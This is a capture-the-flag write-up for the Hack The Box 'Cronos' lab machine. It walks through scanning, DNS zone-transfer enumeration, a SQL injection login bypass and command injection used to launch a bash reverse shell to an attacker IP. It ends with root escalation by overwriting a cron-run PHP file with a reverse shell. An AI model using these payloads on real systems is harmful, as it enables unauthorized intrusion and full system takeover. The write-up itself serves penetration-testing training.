Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
As always, we start with an all port nmap scan: nmap -p – 10.10.10.13
data:image/s3,"s3://crabby-images/c41bc/c41bc4411aad013e5594631dca749ad51e34288a" alt=""
Pretty standard, so let’s see if we can determine versions and see if we have any scripts available: nmap -p 22,53,80 -sC -sV 10.10.10.13
data:image/s3,"s3://crabby-images/88364/883649e16c4a24ee0ba0cbbb238ebb1f05056a81" alt=""
So we have a website running Apache, let’s bring up Firefox and check it out.
data:image/s3,"s3://crabby-images/fbe28/fbe28af95d19c26be5c597b9685d135c0db57933" alt=""
Let’s see if we can do some enumeration with Dirbuster: gobuster dir -u http://10.10.10.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
After letting that run for a bit nothing exciting came up:
data:image/s3,"s3://crabby-images/b7c78/b7c783f7a0c0873c3d52c76b84c89191c4107713" alt=""
Now let’s try some DNS Enumeration: host -l cronos.htb 10.10.10.13
data:image/s3,"s3://crabby-images/91ee0/91ee0498769f5e4bf0a5e5c7df0c2821e5e3c1df" alt=""
Excellent, there’s two sub domains: admin.cronos.htb and www.cronos.htb. Let’s update our /etc/hosts file with this information.
data:image/s3,"s3://crabby-images/a3a6a/a3a6a0356a5b45b71b0008f23126e597dbefa8e5" alt=""
Once we save that file we can bring up our web browser and navigate to http://admin.cronos.htb and we see that we get a login page.
data:image/s3,"s3://crabby-images/2a350/2a35099e478bcd6fe27b56eaa06aa90f620243bf" alt=""
I initially tried several SQL injection payloads here at first. One finally worked: ‘or’1’=’1’;– – and I put it in both the username and password field. This page is a great starting point for different SQL injection payloads: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#authentication-bypass
data:image/s3,"s3://crabby-images/3dc75/3dc75f6f09855a939599f1d4118168b3e1664dad" alt=""
So playing with this it looks like it’s a tool for code execution. You sometimes see these in web pages for tech products like firewalls and stuff.
data:image/s3,"s3://crabby-images/00859/00859db433d0bb776d25c2438adac59f40f7a28e" alt=""
Let’s try running something else, like ls; ls -la
data:image/s3,"s3://crabby-images/603b9/603b9745bbefc702299bdb2c538b01e341d03d51" alt=""
The fact that we can stack commands with a ; is awesome (though bad for the user). We can utilize this to get a shell on our target: ; /bin/bash -c “/bin/bash -i >& /dev/tcp/10.10.14.18/8080 0>&1”
data:image/s3,"s3://crabby-images/3268c/3268c5f33b8105a7d8a3d71bb8664340d8b3aa7e" alt=""
So once we setup our NetCat listener and then run the shell above…we should have a shell
data:image/s3,"s3://crabby-images/cf2f4/cf2f4c91c5f8fbc2ab214e6e433e66d413ade975" alt=""
Enumeration – LinEnum.sh
We’re going to Enumerate with LinEnum.sh, which we can get from here: https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
We’ll use WGET to download it: wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
data:image/s3,"s3://crabby-images/69ace/69ace10c6c749461f418c2436f41aa8de48c901f" alt=""
And then we’ll use the Python SimpleHTTPServer to transfer it over to our target machine:
data:image/s3,"s3://crabby-images/ffbd4/ffbd41f0576176a38b0a3fead706a5fddacc34c6" alt=""
data:image/s3,"s3://crabby-images/c6197/c619713267c3578f7f43ed62468281999f70efd9" alt=""
And then we’ll execute it with bash LinEnum.sh -t
data:image/s3,"s3://crabby-images/ea380/ea380444a7e2de76833e28d403320f9ce916a3d5" alt=""
There’s a lot to go through here, but one thing that’s always worth looking at is the Crontabs (hint due to the box name?).
data:image/s3,"s3://crabby-images/31290/312909d990e2bb71e7c3faa937a2aa40b18708d7" alt=""
We see that we have a cronjob at the bottom run every minute of every day as root (last line in the cron jobs). It looks like the path is /var/www/laravel/artisan
Let’s start by catting this file: cat /var/www/laravel/artisan
data:image/s3,"s3://crabby-images/bf33b/bf33bc7e7592cdff0a092cc13a335607aee5fe7e" alt=""
So it looks like the file that’s used for the cron job is a php file. This should make it easy for us to use the php reverse shell from PenTest Monkey: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Let’s download this to our Kali box and then update it with our Kali machine IP and port we’re going to listen on:
data:image/s3,"s3://crabby-images/93ba3/93ba35051f721f339150291afbb8e48adab3705b" alt=""
Now, since we already have our SimpleHTTPServer up, we should be able to just wget it: wget php-reverse-shell.php
data:image/s3,"s3://crabby-images/8a58c/8a58cdce27d3538421075110cc868fd1ba68874a" alt=""
Move the file to the /var/www/laravel/artisan directory (and thus overwriting the current one): mv php-reverse-shell.php /var/www/laravel/artisan
data:image/s3,"s3://crabby-images/50779/507793904e9c90d140a72dbcef65265122734317" alt=""
Quickly setup your NetCat listener, and wait:
data:image/s3,"s3://crabby-images/92b98/92b980d056e4df0f9af2b5298f0ba3aa27683745" alt=""
A quick whoami reveals root, and you can navigate to /root to get the root flat.